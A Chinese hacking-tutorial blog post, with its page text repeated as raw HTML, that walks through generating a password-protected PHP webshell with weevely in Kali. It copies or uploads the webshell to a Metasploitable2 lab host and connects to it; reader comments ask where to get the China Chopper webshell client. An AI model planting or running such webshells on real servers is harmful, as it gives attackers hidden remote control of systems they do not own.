kali下的中国菜刀

Author：逍遥子
发布时间：May 4, 2018
20329 views
4 comments
944 words
Categories：全部黑客教学渗透测试木马免杀

weevely 是kali中的php webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且携带了大量的管理模块，为渗透带来了更多的惊喜与便利！下面我们来实例演示， weevely 的具体使用。

准备环境：

kali linux
Metasploitables2

首先还是先制作一个 webshell ,密码为 bbskali

weevely generate bbskali secist.php

可以看到，很快就为我们生成了一个大小1000多字节的 webshell 。

我们使用 cat 命令简单查看下 webshell 的内容：

cat /usr/share/weevely/secist.php

请输入图片描述
现在我将生成的 webshell 远程拷贝到目标机器上：

scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin

或者上传PHP木马

连接一句话木马

weevely http://192.168.30.128/secist.php secist

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/87.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali笔记一键关注

Last modification：May 4, 2018

© Allow specification reprint

正在沿街乞讨中……

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!

Comment *

Private comment

Name *

🎲

Email *

Site

4 comments

伟哥 中国河南洛阳
May 16th, 2020 at 05:12 pm

|´・ω・)ノ

Reply
nigle 中国浙江金华
August 22nd, 2019 at 11:51 pm

请问一下大佬windows的中国菜刀在哪下啊？
我在百度中搜的网站系统说是不安全的下载，就不敢下了，生怕别人开了个后门。

Reply
1. 逍遥子 中国北京
  August 23rd, 2019 at 07:16 am
  
  @nigle
  
  菜刀是有官网的，只不过是报毒，其他网站的尽量不要用，后门较多！
  
  Reply
  1. nigle 中国江苏扬州
    August 23rd, 2019 at 06:23 pm
    
    @逍遥子
    
    请问下是www.zhongguocaidao.com
    还是 www.maicaidao.co
    这两个都像官网欸OωO
    
    Reply

妥当个哈狗
大佬请教一下，我一台普通的pc机，2块1t的硬盘，bios设置...
很无语
请问最后一步怎么修改VUE呀
xxxyyy
抖音那个现在是不是失效了，能下载不能播放，博主有空再验证一下呗
Kevin's Space
我改天试一下，现在我是传到网上的一些平台，倒也快速
Kevin's Space
这动环监控不会是你手搓的吧？大佬！

kali下的中国菜刀

逍遥子 • 2018 年 05 月 04 日

<p>weevely 是kali中的php webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且携带了大量的管理模块，为渗透带来了更多的惊喜与便利！下面我们来实例演示， weevely 的具体使用。</p><h3>准备环境：</h3><ul><li>kali linux</li><li>Metasploitables2</li></ul><p>首先还是先制作一个 webshell ,密码为 bbskali</p><pre><code class="lang-shell">weevely generate bbskali secist.php</code></pre><p>可以看到，很快就为我们生成了一个大小1000多字节的 webshell 。<br><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014185456.png" alt="" title="" style=""><br>我们使用 cat 命令简单查看下 webshell 的内容：</p><pre><code class="lang-shell">cat /usr/share/weevely/secist.php</code></pre><p><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014185525.png" alt="请输入图片描述" title="请输入图片描述" style=""><br>现在我将生成的 webshell 远程拷贝到目标机器上：</p><pre><code class="lang-shell">scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin</code></pre><p>或者上传PHP木马</p><h3>连接一句话木马</h3><pre><code class="lang-shell">weevely http://192.168.30.128/secist.php secist</code></pre><p><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014190249.png" alt="" title="" style=""></p><p><img src="https://blog.bbskali.cn/usr/uploads/2018/05/913194665.png" alt="" title="" style=""></p><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/87.html">https://blog.bbskali.cn/87.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>